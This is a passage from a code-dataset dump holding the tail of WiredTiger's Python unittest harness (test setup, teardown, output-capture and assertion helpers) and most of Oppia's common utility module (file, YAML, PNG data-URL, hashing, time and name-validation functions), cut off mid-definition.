+ str(self.__class__.wt_ntests)\n self.testdir = os.path.join(WiredTigerTestCase._parentTestdir, self.testsubdir)\n self.__class__.wt_ntests += 1\n self.starttime = time.time()\n if WiredTigerTestCase._verbose > 2:\n self.prhead('started in ' + self.testdir, True)\n # tearDown needs connections list, set it here in case the open fails.\n self._connections = []\n self.origcwd = os.getcwd()\n shutil.rmtree(self.testdir, ignore_errors=True)\n if os.path.exists(self.testdir):\n raise Exception(self.testdir + \": cannot remove directory\")\n os.makedirs(self.testdir)\n os.chdir(self.testdir)\n with open('testname.txt', 'w+') as namefile:\n namefile.write(str(self) + '\\n')\n self.fdSetUp()\n # tearDown needs a conn field, set it here in case the open fails.\n self.conn = None\n try:\n self.conn = self.setUpConnectionOpen(\".\")\n self.session = self.setUpSessionOpen(self.conn)\n except:\n self.tearDown()\n raise\n\n def tearDown(self):\n excinfo = sys.exc_info()\n passed = (excinfo == (None, None, None))\n if passed:\n skipped = False\n else:\n skipped = (excinfo[0] == unittest.SkipTest)\n self.pr('finishing')\n\n # Close all connections that weren't explicitly closed.\n # Connections left open (as a result of a test failure)\n # can result in cascading errors. We also make sure\n # self.conn is on the list of active connections.\n if not self.conn in self._connections:\n self._connections.append(self.conn)\n for conn in self._connections:\n try:\n conn.close()\n except:\n pass\n self._connections = []\n\n try:\n self.fdTearDown()\n # Only check for unexpected output if the test passed\n if passed:\n self.captureout.check(self)\n self.captureerr.check(self)\n finally:\n # always get back to original directory\n os.chdir(self.origcwd)\n\n # Make sure no read-only files or directories were left behind\n os.chmod(self.testdir, 0777)\n for root, dirs, files in os.walk(self.testdir):\n for d in dirs:\n os.chmod(os.path.join(root, d), 0777)\n for f in files:\n os.chmod(os.path.join(root, f), 0666)\n\n # Clean up unless there's a failure\n if (passed or skipped) and not WiredTigerTestCase._preserveFiles:\n shutil.rmtree(self.testdir, ignore_errors=True)\n else:\n self.pr('preserving directory ' + self.testdir)\n\n elapsed = time.time() - self.starttime\n if elapsed > 0.001 and WiredTigerTestCase._verbose >= 2:\n print \"%s: %.2f seconds\" % (str(self), elapsed)\n if not passed and not skipped:\n print \"ERROR in \" + str(self)\n self.pr('FAIL')\n self.prexception(excinfo)\n self.pr('preserving directory ' + self.testdir)\n if WiredTigerTestCase._verbose > 2:\n self.prhead('TEST COMPLETED')\n\n def backup(self, backup_dir, session=None):\n if session is None:\n session = self.session\n shutil.rmtree(backup_dir, ignore_errors=True)\n os.mkdir(backup_dir)\n bkp_cursor = session.open_cursor('backup:', None, None)\n while True:\n ret = bkp_cursor.next()\n if ret != 0:\n break\n shutil.copy(bkp_cursor.get_key(), backup_dir)\n self.assertEqual(ret, wiredtiger.WT_NOTFOUND)\n bkp_cursor.close()\n\n @contextmanager\n def expectedStdout(self, expect):\n self.captureout.check(self)\n yield\n self.captureout.checkAdditional(self, expect)\n\n @contextmanager\n def expectedStderr(self, expect):\n self.captureerr.check(self)\n yield\n self.captureerr.checkAdditional(self, expect)\n\n @contextmanager\n def expectedStdoutPattern(self, pat):\n self.captureout.check(self)\n yield\n self.captureout.checkAdditionalPattern(self, pat)\n\n @contextmanager\n def expectedStderrPattern(self, pat):\n self.captureerr.check(self)\n 
yield\n self.captureerr.checkAdditionalPattern(self, pat)\n\n def assertRaisesWithMessage(self, exceptionType, expr, message):\n \"\"\"\n Like TestCase.assertRaises(), but also checks to see\n that a message is printed on stderr. If message starts\n and ends with a slash, it is considered a pattern that\n must appear in stderr (it need not encompass the entire\n error output). Otherwise, the message must match verbatim,\n including any trailing newlines.\n \"\"\"\n if len(message) > 2 and message[0] == '/' and message[-1] == '/':\n with self.expectedStderrPattern(message[1:-1]):\n self.assertRaises(exceptionType, expr)\n else:\n with self.expectedStderr(message):\n self.assertRaises(exceptionType, expr)\n\n def assertRaisesException(self, exceptionType, expr,\n exceptionString=None, optional=False):\n \"\"\"\n Like TestCase.assertRaises(), with some additional options.\n If the exceptionString argument is used, the exception's string\n must match it. If optional is set, then no assertion occurs\n if the exception doesn't occur.\n Returns true if the assertion is raised.\n \"\"\"\n raised = False\n try:\n expr()\n except BaseException, err:\n if not isinstance(err, exceptionType):\n self.fail('Exception of incorrect type raised, got type: ' + \\\n str(type(err)))\n if exceptionString != None and exceptionString != str(err):\n self.fail('Exception with incorrect string raised, got: \"' + \\\n str(err) + '\"')\n raised = True\n if not raised and not optional:\n self.fail('no assertion raised')\n return raised\n\n def raisesBusy(self, expr):\n \"\"\"\n Execute the expression, returning true if a 'Resource busy'\n exception is raised, returning false if no exception is raised.\n Any other exception raises a test suite failure.\n \"\"\"\n return self.assertRaisesException(wiredtiger.WiredTigerError, \\\n expr, exceptionString='Resource busy', optional=True)\n\n def assertTimestampsEqual(self, ts1, ts2):\n \"\"\"\n TestCase.assertEqual() for timestamps\n \"\"\"\n self.assertEqual(int(ts1, 16), int(ts2, 16))\n\n def exceptionToStderr(self, expr):\n \"\"\"\n Used by assertRaisesHavingMessage to convert an expression\n that throws an error to an expression that throws the\n same error but also has the exception string on stderr.\n \"\"\"\n try:\n expr()\n except BaseException, err:\n sys.stderr.write('Exception: ' + str(err))\n raise\n\n def assertRaisesHavingMessage(self, exceptionType, expr, message):\n \"\"\"\n Like TestCase.assertRaises(), but also checks to see\n that the assert exception, when string-ified, includes a message.\n If message starts and ends with a slash, it is considered a pattern that\n must appear (it need not encompass the entire message).\n Otherwise, the message must match verbatim.\n \"\"\"\n self.assertRaisesWithMessage(\n exceptionType, lambda: self.exceptionToStderr(expr), message)\n\n @staticmethod\n def printOnce(msg):\n # There's a race condition with multiple threads,\n # but we won't worry about it. 
We err on the side\n # of printing the message too many times.\n if not msg in WiredTigerTestCase._printOnceSeen:\n WiredTigerTestCase._printOnceSeen[msg] = msg\n WiredTigerTestCase.prout(msg)\n\n def KNOWN_FAILURE(self, name):\n myname = self.simpleName()\n msg = '**** ' + myname + ' HAS A KNOWN FAILURE: ' + name + ' ****'\n self.printOnce(msg)\n self.skipTest('KNOWN FAILURE: ' + name)\n\n def KNOWN_LIMITATION(self, name):\n myname = self.simpleName()\n msg = '**** ' + myname + ' HAS A KNOWN LIMITATION: ' + name + ' ****'\n self.printOnce(msg)\n\n @staticmethod\n def printVerbose(level, message):\n if level <= WiredTigerTestCase._verbose:\n WiredTigerTestCase.prout(message)\n\n def verbose(self, level, message):\n WiredTigerTestCase.printVerbose(level, message)\n\n def prout(self, s):\n WiredTigerTestCase.prout(s)\n\n @staticmethod\n def prout(s):\n os.write(WiredTigerTestCase._dupout, s + '\\n')\n\n def pr(self, s):\n \"\"\"\n print a progress line for testing\n \"\"\"\n msg = ' ' + self.shortid() + ': ' + s\n WiredTigerTestCase._resultfile.write(msg + '\\n')\n\n def prhead(self, s, *beginning):\n \"\"\"\n print a header line for testing, something important\n \"\"\"\n msg = ''\n if len(beginning) > 0:\n msg += '\\n'\n msg += ' ' + self.shortid() + ': ' + s\n self.prout(msg)\n WiredTigerTestCase._resultfile.write(msg + '\\n')\n\n def prexception(self, excinfo):\n WiredTigerTestCase._resultfile.write('\\n')\n traceback.print_exception(excinfo[0], excinfo[1], excinfo[2], None, WiredTigerTestCase._resultfile)\n WiredTigerTestCase._resultfile.write('\\n')\n\n # print directly to tty, useful for debugging\n def tty(self, message):\n WiredTigerTestCase.tty(message)\n\n @staticmethod\n def tty(message):\n if WiredTigerTestCase._ttyDescriptor == None:\n WiredTigerTestCase._ttyDescriptor = open('/dev/tty', 'w')\n WiredTigerTestCase._ttyDescriptor.write(message + '\\n')\n\n def ttyVerbose(self, level, message):\n WiredTigerTestCase.ttyVerbose(level, message)\n\n @staticmethod\n def ttyVerbose(level, message):\n if level <= WiredTigerTestCase._verbose:\n WiredTigerTestCase.tty(message)\n\n def shortid(self):\n return self.id().replace(\"__main__.\",\"\")\n\n def className(self):\n return self.__class__.__name__\n\ndef longtest(description):\n \"\"\"\n Used as a function decorator, for example, @wttest.longtest(\"description\").\n The decorator indicates that this test function should only be included\n when running the test suite with the --long option.\n \"\"\"\n def runit_decorator(func):\n return func\n if not WiredTigerTestCase._longtest:\n return unittest.skip(description + ' (enable with --long)')\n else:\n return runit_decorator\n\ndef islongtest():\n return WiredTigerTestCase._longtest\n\ndef runsuite(suite, parallel):\n suite_to_run = suite\n if parallel > 1:\n from concurrencytest import ConcurrentTestSuite, fork_for_tests\n if not WiredTigerTestCase._globalSetup:\n WiredTigerTestCase.globalSetup()\n WiredTigerTestCase._concurrent = True\n suite_to_run = ConcurrentTestSuite(suite, fork_for_tests(parallel))\n try:\n return unittest.TextTestRunner(\n verbosity=WiredTigerTestCase._verbose).run(suite_to_run)\n except BaseException as e:\n # This should not happen for regular test errors, unittest should catch everything\n print('ERROR: running test: ', e)\n raise e\n\ndef run(name='__main__'):\n result = runsuite(unittest.TestLoader().loadTestsFromName(name), False)\n sys.exit(0 if result.wasSuccessful() else 1)\n"} {"ext": "py", "sha": "1a2fde60eade4ec61d78ac03634d61eca65b86a7", "content": 
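# Illustrative usage sketch (not part of the corpus records above or below): how a test module
# would typically exercise the WiredTigerTestCase helpers defined in the preceding file. The
# table name, the expected error text, and the 'wttest'/'wiredtiger' import names are assumptions.
import wiredtiger, wttest

class test_example(wttest.WiredTigerTestCase):
    def test_drop_missing_table(self):
        # A message wrapped in slashes is treated as a stderr pattern that only needs to
        # appear somewhere in the output; any other message must match stderr verbatim.
        self.assertRaisesWithMessage(
            wiredtiger.WiredTigerError,
            lambda: self.session.drop('table:no_such_table', None),
            '/No such file or directory/')

if __name__ == '__main__':
    wttest.run()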
"# Copyright 2014 The Oppia Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Common utility functions.\"\"\"\n\nfrom __future__ import absolute_import # pylint: disable=import-only-modules\nfrom __future__ import unicode_literals # pylint: disable=import-only-modules\n\nimport base64\nimport collections\nimport datetime\nimport hashlib\nimport imghdr\nimport json\nimport os\nimport random\nimport re\nimport string\nimport sys\nimport time\nimport unicodedata\nimport zlib\n\nfrom constants import constants\nimport feconf\nimport python_utils\n\n_YAML_PATH = os.path.join(os.getcwd(), '..', 'oppia_tools', 'pyyaml-5.1.2')\nsys.path.insert(0, _YAML_PATH)\n\nimport yaml # isort:skip #pylint: disable=wrong-import-position\n\nDATETIME_FORMAT = '%m/%d/%Y, %H:%M:%S:%f'\nPNG_DATA_URL_PREFIX = 'data:image/png;base64,'\nSECONDS_IN_HOUR = 60 * 60\nSECONDS_IN_MINUTE = 60\n\n\nclass InvalidInputException(Exception):\n \"\"\"Error class for invalid input.\"\"\"\n\n pass\n\n\nclass ValidationError(Exception):\n \"\"\"Error class for when a domain object fails validation.\"\"\"\n\n pass\n\n\nclass ExplorationConversionError(Exception):\n \"\"\"Error class for when an exploration fails to convert from a certain\n version to a certain version.\n \"\"\"\n\n pass\n\n\ndef create_enum(*sequential, **names):\n \"\"\"Creates a enumerated constant.\n\n Args:\n *sequential: *. Sequence List to generate the enumerations.\n **names: *. Names of the enumerration.\n\n Returns:\n dict. Dictionary containing the enumerated constants.\n \"\"\"\n enums = dict(python_utils.ZIP(sequential, sequential), **names)\n return type(b'Enum', (), enums)\n\n\ndef get_file_contents(filepath, raw_bytes=False, mode='r'):\n \"\"\"Gets the contents of a file, given a relative filepath from oppia/.\n\n Args:\n filepath: str. A full path to the file.\n raw_bytes: bool. Flag for the raw_bytes output.\n mode: str. File opening mode, default is in read mode.\n\n Returns:\n *. Either the raw_bytes stream if the flag is set or the\n decoded stream in utf-8 format.\n \"\"\"\n if raw_bytes:\n mode = 'rb'\n encoding = None\n else:\n encoding = 'utf-8'\n\n with python_utils.open_file(filepath, mode, encoding=encoding) as f:\n return f.read()\n\n\ndef get_exploration_components_from_dir(dir_path):\n \"\"\"Gets the (yaml, assets) from the contents of an exploration data dir.\n\n Args:\n dir_path: str. A full path to the exploration root directory.\n\n Returns:\n *. A 2-tuple, the first element of which is a yaml string, and the\n second element of which is a list of (filepath, content) 2-tuples.\n The filepath does not include the assets/ prefix.\n\n Raises:\n Exception. 
If the following condition doesn't hold: \"There\n is exactly one file not in assets/, and this file has a\n .yaml suffix\".\n \"\"\"\n yaml_content = None\n assets_list = []\n\n dir_path_array = dir_path.split('/')\n while dir_path_array[-1] == '':\n dir_path_array = dir_path_array[:-1]\n dir_path_length = len(dir_path_array)\n\n for root, directories, files in os.walk(dir_path):\n for directory in directories:\n if root == dir_path and directory != 'assets':\n raise Exception(\n 'The only directory in %s should be assets/' % dir_path)\n\n for filename in files:\n filepath = os.path.join(root, filename)\n if root == dir_path:\n # These files are added automatically by Mac OS Xsystems.\n # We ignore them.\n if not filepath.endswith('.DS_Store'):\n if yaml_content is not None:\n raise Exception(\n 'More than one non-asset file specified '\n 'for %s' % dir_path)\n elif not filepath.endswith('.yaml'):\n raise Exception(\n 'Found invalid non-asset file %s. There '\n 'should only be a single non-asset file, '\n 'and it should have a .yaml suffix.' % filepath)\n else:\n yaml_content = get_file_contents(filepath)\n else:\n filepath_array = filepath.split('/')\n # The additional offset is to remove the 'assets/' prefix.\n filename = '/'.join(filepath_array[dir_path_length + 1:])\n assets_list.append((filename, get_file_contents(\n filepath, raw_bytes=True)))\n\n if yaml_content is None:\n raise Exception('No yaml file specifed for %s' % dir_path)\n\n return yaml_content, assets_list\n\n\ndef get_comma_sep_string_from_list(items):\n \"\"\"Turns a list of items into a comma-separated string.\n\n Args:\n items: list(str). List of the items.\n\n Returns:\n str. String containing the items in the list separated by commas.\n \"\"\"\n\n if not items:\n return ''\n\n if len(items) == 1:\n return items[0]\n\n return '%s and %s' % (', '.join(items[:-1]), items[-1])\n\n\ndef to_ascii(input_string):\n \"\"\"Change unicode characters in a string to ascii if possible.\n\n Args:\n input_string: str. String to convert.\n\n Returns:\n str. String containing the ascii representation of the input string.\n \"\"\"\n return unicodedata.normalize(\n 'NFKD', python_utils.UNICODE(input_string)).encode('ascii', 'ignore')\n\n\ndef dict_from_yaml(yaml_str):\n \"\"\"Gets the dict representation of a YAML string.\n\n Args:\n yaml_str: str. Yaml string for conversion into dict.\n\n Returns:\n dict. Parsed dict representation of the yaml string.\n\n Raises:\n InavlidInputException. If the yaml string sent as the\n parameter is unable to get parsed, them this error gets\n raised.\n \"\"\"\n try:\n retrieved_dict = yaml.safe_load(yaml_str)\n assert isinstance(retrieved_dict, dict)\n return retrieved_dict\n except (AssertionError, yaml.YAMLError) as e:\n raise InvalidInputException(e)\n\n\ndef recursively_remove_key(obj, key_to_remove):\n \"\"\"Recursively removes keys from a list or dict.\n\n Args:\n obj: *. List or dict passed for which the keys has to\n be removed.\n key_to_remove: str. Key value that has to be removed.\n\n Returns:\n *. Dict or list with a particular key value removed.\n \"\"\"\n if isinstance(obj, list):\n for item in obj:\n recursively_remove_key(item, key_to_remove)\n elif isinstance(obj, dict):\n if key_to_remove in obj:\n del obj[key_to_remove]\n for key, unused_value in obj.items():\n recursively_remove_key(obj[key], key_to_remove)\n\n\ndef get_random_int(upper_bound):\n \"\"\"Returns a random integer in [0, upper_bound).\n\n Args:\n upper_bound: int. 
Upper limit for generation of random\n integer.\n\n Returns:\n int. Randomly generated integer less than the upper_bound.\n \"\"\"\n assert upper_bound >= 0 and isinstance(upper_bound, int)\n\n generator = random.SystemRandom()\n return generator.randrange(0, stop=upper_bound)\n\n\ndef get_random_choice(alist):\n \"\"\"Gets a random element from a list.\n\n Args:\n alist: list(*). Input to get a random choice.\n\n Returns:\n *. Random element choosen from the passed input list.\n \"\"\"\n assert isinstance(alist, list) and len(alist) > 0\n\n index = get_random_int(len(alist))\n return alist[index]\n\n\ndef convert_png_data_url_to_binary(image_data_url):\n \"\"\"Converts a PNG base64 data URL to a PNG binary data.\n\n Args:\n image_data_url: str. A string that is to be interpreted as a PNG\n data URL.\n\n Returns:\n str. Binary content of the PNG created from the data URL.\n\n Raises:\n Exception. The given string does not represent a PNG data URL.\n \"\"\"\n if image_data_url.startswith(PNG_DATA_URL_PREFIX):\n return base64.b64decode(\n python_utils.urllib_unquote(\n image_data_url[len(PNG_DATA_URL_PREFIX):]))\n else:\n raise Exception('The given string does not represent a PNG data URL.')\n\n\ndef convert_png_binary_to_data_url(content):\n \"\"\"Converts a PNG image string (represented by 'content') to a data URL.\n\n Args:\n content: str. PNG binary file content.\n\n Returns:\n str. Data URL created from the binary content of the PNG.\n\n Raises:\n Exception. The given binary string does not represent a PNG image.\n \"\"\"\n if imghdr.what(None, h=content) == 'png':\n return '%s%s' % (\n PNG_DATA_URL_PREFIX,\n python_utils.url_quote(base64.b64encode(content))\n )\n else:\n raise Exception('The given string does not represent a PNG image.')\n\n\ndef convert_png_to_data_url(filepath):\n \"\"\"Converts the png file at filepath to a data URL.\n\n Args:\n filepath: str. A full path to the file.\n\n Returns:\n str. Data url created from the filepath of the PNG.\n \"\"\"\n file_contents = get_file_contents(filepath, raw_bytes=True, mode='rb')\n return convert_png_binary_to_data_url(file_contents)\n\n\ndef camelcase_to_hyphenated(camelcase_str):\n \"\"\"Camelcase to hyhpenated conversion of the passed string.\n\n Args:\n camelcase_str: str. Camelcase string representation.\n\n Returns:\n str. Hypenated string representation of the camelcase string.\n \"\"\"\n intermediate_str = re.sub('(.)([A-Z][a-z]+)', r'\\1-\\2', camelcase_str)\n return re.sub('([a-z0-9])([A-Z])', r'\\1-\\2', intermediate_str).lower()\n\n\ndef camelcase_to_snakecase(camelcase_str):\n \"\"\"Camelcase to snake case conversion of the passed string.\n\n Args:\n camelcase_str: str. Camelcase string representation.\n\n Returns:\n str. Snakecase representation of the passed camelcase string.\n \"\"\"\n intermediate_str = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', camelcase_str)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', intermediate_str).lower()\n\n\ndef set_url_query_parameter(url, param_name, param_value):\n \"\"\"Set or replace a query parameter, and return the modified URL.\n\n Args:\n url: str. URL string which contains the query parameter.\n param_name: str. Parameter name to be removed.\n param_value: str. Set the parameter value, if it exists.\n\n Returns:\n str. Formated URL that has query parameter set or replaced.\n\n Raises:\n Exception. 
If the query parameter sent is not of string type,\n them this exception is raised.\n \"\"\"\n if not isinstance(param_name, python_utils.BASESTRING):\n raise Exception(\n 'URL query parameter name must be a string, received %s'\n % param_name)\n\n scheme, netloc, path, query_string, fragment = python_utils.url_split(url)\n query_params = python_utils.parse_query_string(query_string)\n\n query_params[param_name] = [param_value]\n new_query_string = python_utils.url_encode(query_params, doseq=True)\n\n return python_utils.url_unsplit(\n (scheme, netloc, path, new_query_string, fragment))\n\n\nclass JSONEncoderForHTML(json.JSONEncoder):\n \"\"\"Encodes JSON that is safe to embed in HTML.\"\"\"\n\n def encode(self, o):\n chunks = self.iterencode(o, True)\n return ''.join(chunks) if self.ensure_ascii else u''.join(chunks)\n\n def iterencode(self, o, _one_shot=False):\n chunks = super(\n JSONEncoderForHTML, self).iterencode(o, _one_shot=_one_shot)\n for chunk in chunks:\n yield chunk.replace('&', '\\\\u0026').replace(\n '<', '\\\\u003c').replace('>', '\\\\u003e')\n\n\ndef convert_to_hash(input_string, max_length):\n \"\"\"Convert a string to a SHA1 hash.\n\n Args:\n input_string: str. Input string for conversion to hash.\n max_length: int. Maximum Length of the generated hash.\n\n Returns:\n str. Hash Value generated from the input_String of the\n specified length.\n\n Raises:\n Exception. If the input string is not the instance of the str,\n them this exception is raised.\n \"\"\"\n if not isinstance(input_string, python_utils.BASESTRING):\n raise Exception(\n 'Expected string, received %s of type %s' %\n (input_string, type(input_string)))\n\n # Encodes strings using the character set [A-Za-z0-9].\n # Prefixing altchars with b' to ensure that all characters in encoded_string\n # remain encoded (otherwise encoded_string would be of type unicode).\n encoded_string = base64.b64encode(\n hashlib.sha1(python_utils.convert_to_bytes(input_string)).digest(),\n altchars=b'ab'\n ).replace('=', 'c')\n\n return encoded_string[:max_length]\n\n\ndef base64_from_int(value):\n \"\"\"Converts the number into base64 representation.\n\n Args:\n value: int. Integer value for conversion into base64.\n\n Returns:\n *. Returns the base64 representation of the number passed.\n \"\"\"\n return base64.b64encode(bytes([value]))\n\n\ndef get_time_in_millisecs(datetime_obj):\n \"\"\"Returns time in milliseconds since the Epoch.\n\n Args:\n datetime_obj: datetime. An object of type datetime.datetime.\n\n Returns:\n float. The time in milliseconds since the Epoch.\n \"\"\"\n msecs = time.mktime(datetime_obj.timetuple()) * 1000.0\n return msecs + python_utils.divide(datetime_obj.microsecond, 1000.0)\n\n\ndef convert_naive_datetime_to_string(datetime_obj):\n \"\"\"Returns a human-readable string representing the naive datetime object.\n\n Args:\n datetime_obj: datetime. An object of type datetime.datetime. Must be a\n naive datetime object.\n\n Returns:\n str. The string representing the naive datetime object.\n \"\"\"\n return datetime_obj.strftime(DATETIME_FORMAT)\n\n\ndef convert_string_to_naive_datetime_object(date_time_string):\n \"\"\"Returns the naive datetime object equivalent of the date string.\n\n Args:\n date_time_string: str. The string format representing the datetime\n object in the format: Month/Day/Year,\n Hour:Minute:Second:MicroSecond.\n\n Returns:\n datetime. 
An object of type naive datetime.datetime corresponding to\n that string.\n \"\"\"\n return datetime.datetime.strptime(date_time_string, DATETIME_FORMAT)\n\n\ndef get_current_time_in_millisecs():\n \"\"\"Returns time in milliseconds since the Epoch.\n\n Returns:\n float. The time in milliseconds since the Epoch.\n \"\"\"\n return get_time_in_millisecs(datetime.datetime.utcnow())\n\n\ndef get_human_readable_time_string(time_msec):\n \"\"\"Given a time in milliseconds since the epoch, get a human-readable\n time string for the admin dashboard.\n\n Args:\n time_msec: float. Time in milliseconds since the Epoch.\n\n Returns:\n str. A string representing the time.\n \"\"\"\n return time.strftime(\n '%B %d %H:%M:%S', time.gmtime(python_utils.divide(time_msec, 1000.0)))\n\n\ndef create_string_from_largest_unit_in_timedelta(timedelta_obj):\n \"\"\"Given the timedelta object, find the largest nonzero time unit and\n return that value, along with the time unit, as a human readable string.\n The returned string is not localized.\n\n Args:\n timedelta_obj: datetime.timedelta. A datetime timedelta object. Datetime\n timedelta objects are created when you subtract two datetime\n objects.\n\n Returns:\n str. A human readable string representing the value of the largest\n nonzero time unit, along with the time units. If the largest time unit\n is seconds, 1 minute is returned. The value is represented as an integer\n in the string.\n\n Raises:\n Exception. If the provided timedelta is not positive.\n \"\"\"\n total_seconds = timedelta_obj.total_seconds()\n if total_seconds <= 0:\n raise Exception(\n 'Expected a positive timedelta, received: %s.' % total_seconds)\n elif timedelta_obj.days != 0:\n return '%s day%s' % (\n int(timedelta_obj.days), 's' if timedelta_obj.days > 1 else '')\n else:\n number_of_hours, remainder = divmod(total_seconds, SECONDS_IN_HOUR)\n number_of_minutes, _ = divmod(remainder, SECONDS_IN_MINUTE)\n if number_of_hours != 0:\n return '%s hour%s' % (\n int(number_of_hours), 's' if number_of_hours > 1 else '')\n elif number_of_minutes > 1:\n return '%s minutes' % int(number_of_minutes)\n # Round any seconds up to one minute.\n else:\n return '1 minute'\n\n\ndef are_datetimes_close(later_datetime, earlier_datetime):\n \"\"\"Given two datetimes, determines whether they are separated by less than\n feconf.PROXIMAL_TIMEDELTA_SECS seconds.\n\n Args:\n later_datetime: datetime. The later datetime.\n earlier_datetime: datetime. The earlier datetime.\n\n Returns:\n bool. True if difference between two datetimes is less than\n feconf.PROXIMAL_TIMEDELTA_SECS seconds otherwise false.\n \"\"\"\n difference_in_secs = (later_datetime - earlier_datetime).total_seconds()\n return difference_in_secs < feconf.PROXIMAL_TIMEDELTA_SECS\n\n\ndef generate_random_string(length):\n \"\"\"Generates a random string of the specified length.\n\n Args:\n length: int. Length of the string to be generated.\n\n Returns:\n str. Random string of specified length.\n \"\"\"\n return base64.urlsafe_b64encode(os.urandom(length))[:length]\n\n\ndef generate_new_session_id():\n \"\"\"Generates a new session id.\n\n Returns:\n str. Random string of length 24.\n \"\"\"\n return generate_random_string(24)\n\n\ndef vfs_construct_path(base_path, *path_components):\n \"\"\"Mimics behavior of os.path.join on Posix machines.\n\n Args:\n base_path: str. The initial path upon which components would be added.\n *path_components: list(str). Components that would be added to the path.\n\n Returns:\n str. 
The path that is obtained after adding the components.\n \"\"\"\n return os.path.join(base_path, *path_components)\n\n\ndef vfs_normpath(path):\n \"\"\"Normalize path from posixpath.py, eliminating double slashes, etc.\n\n Args:\n path: str. Path that is to be normalized.\n\n Returns:\n str. Path if it is not null else a dot string.\n \"\"\"\n return os.path.normpath(path)\n\n\ndef require_valid_name(name, name_type, allow_empty=False):\n \"\"\"Generic name validation.\n\n Args:\n name: str. The name to validate.\n name_type: str. A human-readable string, like 'the exploration title' or\n 'a state name'. This will be shown in error messages.\n allow_empty: bool. If True, empty strings are allowed.\n\n Raises:\n Exception. Name isn't a string.\n Exception. The length of the name_type isn't between\n 1 and 50.\n Exception. Name starts or ends with whitespace.\n Exception. Adjacent whitespace in name_type isn't collapsed.\n Exception. Invalid character is present in name.\n \"\"\"\n if not isinstance(name, python_utils.BASESTRING):\n raise ValidationError('%s must be a string.' % name)\n\n if allow_empty and name == '':\n return\n\n # This check is needed because state names are used in URLs and as ids\n # for statistics, so the name length should be bounded above.\n if len(name) > 50 or len(name) < 1:\n raise ValidationError(\n 'The length of %s should be between 1 and 50 '\n 'characters; received %s' % (name_type, name))\n\n if name[0] in string.whitespace or name[-1] in string.whitespace:\n raise ValidationError(\n 'Names should not start or end with whitespace.')\n\n if re.search(r'\\s\\s+', name):\n raise ValidationError(\n 'Adjacent whitespace in %s should be collapsed.' % name_type)\n\n for character in constants.INVALID_NAME_CHARS:\n if character in name:\n raise ValidationError(\n 'Invalid character %s in %s: %s' %\n (character, name_type, name))\n\n\ndef require_valid_url_fragment(name, name_type, allowed_length):\n \"\"\"Generic URL fragment validation.\n\n Args:\n name: str. The name to validate.\n name_type: str. A human-readable string, like 'topic url fragment'.\n This will be shown in error messages.\n allowed_length: int. Allowed length for the name.\n\n Raises:\n Exception. Name is not a string.\n Exception. Name is empty.\n Exception. The length of the name_type is not correct.\n Exception. Invalid character is present in the name.\n \"\"\"\n if not isinstance(name, python_utils.BASESTRING):\n raise ValidationError(\n '%s field must be a string. Received %s.' % (name_type, name))\n\n if name == '':\n raise ValidationError(\n '%s field should not be empty.' % name_type)\n\n if len(name) > allowed_length:\n raise ValidationError(\n '%s field should not exceed %d characters, '\n 'received %s.' % (name_type, allowed_length, name))\n\n if not re.match(constants.VALID_URL_FRAGMENT_REGEX, name):\n raise ValidationError(\n '%s field contains invalid characters. Only lowercase words'\n ' separated by hyphens are allowed. Received %s.' % (\n name_type, name))\n\n\ndef require_valid_thumbnail_filename(thumbnail_filename):\n \"\"\"Generic thumbnail filename validation.\n\n Args:\n thumbnail_filename: str. 
The thumbnail filename to validate.\n \"\"\"\n if thumbnail_filename is not None:\n if not isinstance(thumbnail_filename, python_utils.BASESTRING):\n raise ValidationError(\n 'Expected thumbnail filename to be a string, received %s'\n % thumbnail_filename)\n if thumbnail_filename.rfind('.') == 0:\n raise ValidationError(\n 'Thumbnail filename should not start with a dot.')\n if '/' in thumbnail_filename or '..' in thumbnail_filename:\n raise ValidationError(\n 'Thumbnail filename should not include slashes or '\n 'consecutive dot characters.')\n if '.' not in thumbnail_filename:\n raise ValidationError(\n 'Thumbnail filename should include an extension.')\n\n dot_index = thumbnail_filename.rfind('.')\n extension = thumbnail_filename[dot_index + 1:].lower()\n if extension != 'svg':\n raise ValidationError(\n 'Expected a filename ending in svg, received %s' %\n thumbnail_filename)\n\n\ndef require_valid_meta_tag_content(meta_tag_content):\n \"\"\"Generic meta tag content validation.\n\n Args:\n meta_tag_content: str. The meta tag content to validate.\n \"\"\"\n if not isinstance(meta_tag_content, python_utils.BASESTRING):\n raise ValidationError(\n 'Expected meta tag content to be a string, received %s'\n % meta_tag_content)\n if len(meta_tag_content) > constants.MAX_CHARS_IN_META_TAG_CONTENT:\n raise ValidationError(\n 'Meta tag content should not be longer than %s characters.'\n % constants.MAX_CHARS_IN_META_TAG_CONTENT)\n\n\ndef require_valid_page_title_fragment_for_web(page_title_fragment_for_web):\n \"\"\"Generic page title fragment validation.\n\n Args:\n page_title_fragment_for_web: str. The page title fragment to validate.\n\n Raises:\n Exception. Page title fragment is not a string.\n Exception. Page title fragment is too lengthy.\n \"\"\"\n max_chars_in_page_title_frag_for_web = (\n constants.MAX_CHARS_IN_PAGE_TITLE_FRAGMENT_FOR_WEB)\n if not isinstance(page_title_fragment_for_web, python_utils.BASESTRING):\n raise ValidationError(\n 'Expected page title fragment to be a string, received %s'\n % page_title_fragment_for_web)\n if len(page_title_fragment_for_web) > max_chars_in_page_title_frag_for_web:\n raise ValidationError(\n 'Page title fragment should not be longer than %s characters.'\n % constants.MAX_CHARS_IN_PAGE_TITLE_FRAGMENT_FOR_WEB)\n\n\ndef capitalize_string(input_string):\n \"\"\"Converts the first character of a string to its uppercase equivalent (if\n it's a letter), and returns the result.\n\n Args:\n input_string: str. String to process (to capitalize).\n\n Returns:\n str. Capitalizes the string.\n \"\"\"\n # This guards against empty strings.\n if input_string:\n return input_string[0].upper() + input_string[1:]\n else:\n return input_string\n\n\ndef get_hex_color_for_category(category):\n \"\"\"Returns the category, it returns the color associated with the category,\n if the category is present in the app constants else given a default color.\n\n Args:\n category: str. Category to get color.\n\n Returns:\n str. Color assigned to that category.\n \"\"\"\n return (\n constants.CATEGORIES_TO_COLORS[category]\n if category in constants.CATEGORIES_TO_COLORS\n else constants.DEFAULT_COLOR)\n\n\ndef 